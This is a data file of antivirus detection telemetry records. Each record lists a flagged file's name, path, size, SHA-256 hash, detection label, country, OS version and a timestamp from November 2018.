  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:33:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:18:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='weatherlord2-hiddenrealm.exe', filepath='D:\\+I G R E +\\BEST of IGRE 2013\\Weather Lord 2 Hidden Realm Setup\\WeatherLord2-HiddenRealm.exe', filesize=1792000, name='TR/Rogue.10415921.#M1.#R1'), hash='251e9a9e2489ce743164fbaaa948e58e70c819f0862e996beacd4be7ccf9d437', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T19:52:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:54:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052225-40c8013a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052225-40C8013A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='p007', filepath='/var/spool/vscan/amavis/tmp/amavis-20181031T191500-01165/parts/p007', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T16:30:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141041-2981f2cf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-141041-2981F2CF', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:13:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-123343-f08ba93a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-123343-F08BA93A', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:36:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-002429-79628100', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c1b809d6\\AVSCAN-20181102-002418-77245D6B\\AVSCAN-20181102-002429-79628100', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:24:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-122443-8c359ffc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-122443-8C359FFC', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:27:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053155-94de190d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053155-94DE190D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='4a75918c7fd1f0ea3ba3a28aaa03900c86d9db3007ec8756ab3be3d27e0ebb1f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\4A75918C7FD1F0EA3BA3A28AAA03900C86D9DB3007EC8756AB3BE3D27E0EBB1F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='4a75918c7fd1f0ea3ba3a28aaa03900c86d9db3007ec8756ab3be3d27e0ebb1f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:14:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054717-ba5bfa25', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054717-BA5BFA25', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134939-3efbac4f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-134939-3EFBAC4F', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:52:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-124320-5bc50221', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-124320-5BC50221', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:46:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051937-dcf7a868', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051937-DCF7A868', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050724-27f91641', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050724-27F91641', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053222-a4f3ef4f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053222-A4F3EF4F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-132950-622d4599', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-132950-622D4599', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:32:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='4e456b0aaaf15232bd7f8a8ae8ffbb0c95469d4c9df4c8be6c7a6c2decef4990', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\4E456B0AAAF15232BD7F8A8AE8FFBB0C95469D4C9DF4C8BE6C7A6C2DECEF4990', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='4e456b0aaaf15232bd7f8a8ae8ffbb0c95469d4c9df4c8be6c7a6c2decef4990', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:42:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050353-a9d5a3c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050353-A9D5A3C7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-142229-ad016660', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-142229-AD016660', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052814-10d6ec17', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052814-10D6EC17', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120507-11ac4e7f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-115910-EAFC0947\\AVSCAN-20181102-120507-11AC4E7F', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061238-44a7f386', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061238-44A7F386', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052845-2392bc2d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052845-2392BC2D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055044-357f0316', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055044-357F0316', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061826-13f08a24', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061826-13F08A24', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055309-8c393e3e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055309-8C393E3E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062122-7d38e3b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062122-7D38E3B6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055545-e91cb292', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055545-E91CB292', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060253-e814d4c4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060253-E814D4C4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053545-1da48171', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053545-1DA48171', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051656-7ce3a77c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051656-7CE3A77C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055045-3605fda9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055045-3605FDA9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061019-f218f6bf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061019-F218F6BF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055638-08e08ce5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055638-08E08CE5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061917-32c4ef14', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061917-32C4EF14', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053943-abc11ce6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053943-ABC11CE6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055657-143086d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055657-143086D0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055555-ef247343', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055555-EF247343', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061938-3ef23e14', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061938-3EF23E14', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062507-0327e5eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062507-0327E5EB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061023-f42b5225', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061023-F42B5225', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061023-f4717f3a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061023-F4717F3A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054937-0d6c558d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054937-0D6C558D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060348-090e0a5b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060348-090E0A5B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061010-ec64d254', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061010-EC64D254', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054432-580d4c23', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054432-580D4C23', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060415-18cfeaa9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060415-18CFEAA9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T09:00:20Z'), dt=datetime.date(2018, 11, 2)),
